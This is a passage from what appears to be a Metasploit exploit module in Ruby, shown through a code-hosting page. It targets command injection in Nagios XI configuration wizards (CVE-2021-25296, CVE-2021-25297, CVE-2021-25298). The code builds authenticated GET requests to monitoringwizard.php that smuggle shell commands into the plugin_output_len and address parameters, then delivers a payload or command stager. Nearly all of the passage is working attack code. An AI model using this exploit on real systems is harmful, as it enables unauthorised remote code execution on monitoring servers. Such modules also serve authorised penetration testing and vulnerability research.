if @version >= Rex::Version.new('5.5.6') && @version <= Rex::Version.new('5.7.5')
|
||||
return CheckCode::Appears
|
||||
end
|
||||
|
||||
return CheckCode::Safe
|
||||
end
|
||||
|
||||
def execute_command(cmd, _opts = {})
|
||||
if !@nsp || !@auth_cookies # Check to see if we already authenticated during the check
|
||||
auth_result, err_msg = authenticate
|
||||
case auth_result
|
||||
when 1
|
||||
fail_with(Failure::Disconnected, err_msg)
|
||||
when 2, 4, 5, 6
|
||||
fail_with(Failure::UnexpectedReply, err_msg)
|
||||
when 3
|
||||
fail_with(Failure::NotVulnerable, err_msg)
|
||||
end
|
||||
end
|
||||
|
||||
# execute payload based on the selected targeted configuration wizard
|
||||
url_params = {
|
||||
'update' => 1,
|
||||
'nsp' => @nsp
|
||||
}
|
||||
# After version 5.5.7, the URL parameter used in CVE-2021-25297 and CVE-2021-25298
|
||||
# changes from address to ip_address
|
||||
if @version <= Rex::Version.new('5.5.7')
|
||||
address_param = 'address'
|
||||
else
|
||||
address_param = 'ip_address'
|
||||
end
|
||||
|
||||
# CVE-2021-25296 affects the windowswmi configuration wizard.
|
||||
if datastore['TARGET_CVE'] == 'CVE-2021-25296'
|
||||
url_params = url_params.merge({
|
||||
'nextstep' => 3,
|
||||
'wizard' => 'windowswmi',
|
||||
'ip_address' => Array.new(4) { rand(256) }.join('.'),
|
||||
'domain' => Rex::Text.rand_text_alphanumeric(7..15),
|
||||
'username' => Rex::Text.rand_text_alphanumeric(7..20),
|
||||
'password' => Rex::Text.rand_text_alphanumeric(7..20),
|
||||
'plugin_output_len' => Rex::Text.rand_text_numeric(5) + "; #{cmd};"
|
||||
})
|
||||
# CVE-2021-25297 affects the switch configuration wizard.
|
||||
elsif datastore['TARGET_CVE'] == 'CVE-2021-25297'
|
||||
url_params = url_params.merge({
|
||||
'nextstep' => 3,
|
||||
'wizard' => 'switch',
|
||||
address_param => Array.new(4) { rand(256) }.join('.') + "\"; #{cmd};",
|
||||
'snmpopts[snmpcommunity]' => Rex::Text.rand_text_alphanumeric(7..15),
|
||||
'scaninterfaces' => 'on'
|
||||
})
|
||||
# CVE-2021-25298 affects the cloud-vm configuration wizard, which we can access by
|
||||
# specifying the digitalocean option for the wizard parameter.
|
||||
elsif datastore['TARGET_CVE'] == 'CVE-2021-25298'
|
||||
url_params = url_params.merge({
|
||||
address_param => Array.new(4) { rand(256) }.join('.') + "; #{cmd};",
|
||||
'nextstep' => 4,
|
||||
'wizard' => 'digitalocean'
|
||||
})
|
||||
else
|
||||
fail_with(Failure::BadConfig, 'Invalid TARGET_CVE: Choose CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298.')
|
||||
end
|
||||
|
||||
print_status('Sending the payload...')
|
||||
# Send the final request. Note that the target is not expected to respond if we get
|
||||
# code execution. Therefore, we set the timeout on this request to 0.
|
||||
send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => '/nagiosxi/config/monitoringwizard.php',
|
||||
'cookie' => @auth_cookies,
|
||||
'vars_get' => url_params
|
||||
})
|
||||
end
|
||||
|
||||
def exploit
|
||||
if target.arch.first == ARCH_CMD
|
||||
execute_command(payload.encoded)
|
||||
else
|
||||
execute_cmdstager(background: true)
|
||||
end
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue